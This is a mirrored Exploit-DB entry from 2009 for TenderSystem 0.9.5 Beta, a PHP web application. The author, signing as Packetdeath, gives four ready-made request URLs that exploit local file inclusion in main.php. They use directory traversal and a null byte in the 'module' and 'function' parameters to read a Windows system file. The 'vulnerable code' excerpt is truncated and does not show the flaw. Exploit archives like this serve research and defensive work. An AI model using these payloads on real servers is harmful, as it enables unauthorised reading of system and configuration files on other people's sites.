bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10445.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

49 lines
No EOL
2.1 KiB
Text
Raw Blame History

__________ __ __ .___ __ .__
\______ \_____ ____ | | __ _____/ |_ __| _/____ _____ _/ |_| |__
| ___/\__ \ _/ ___\| |/ // __ \ __\/ __ |/ __ \\__ \\ __\ | \
| | / __ \\ \___| <\ ___/| | / /_/ \ ___/ / __ \| | | Y \
|____| (____ /\___ >__|_ \\___ >__| \____ |\___ >____ /__| |___| /
\/ \/ \/ \/ \/ \/ \/ \/
-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS
I was unable to get this to work on a Linux server. Further testing may be required.
------------------------------------------------------------------------------------------
Target: TenderSystem
Version: 0.9.5 Beta
Site http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
-------------------------------------------------------------------------------------------
Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php:
// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------
Some things are better left unsaid <3
... That is all.
/Packetdeath
Reference in a new issue View git blame Copy permalink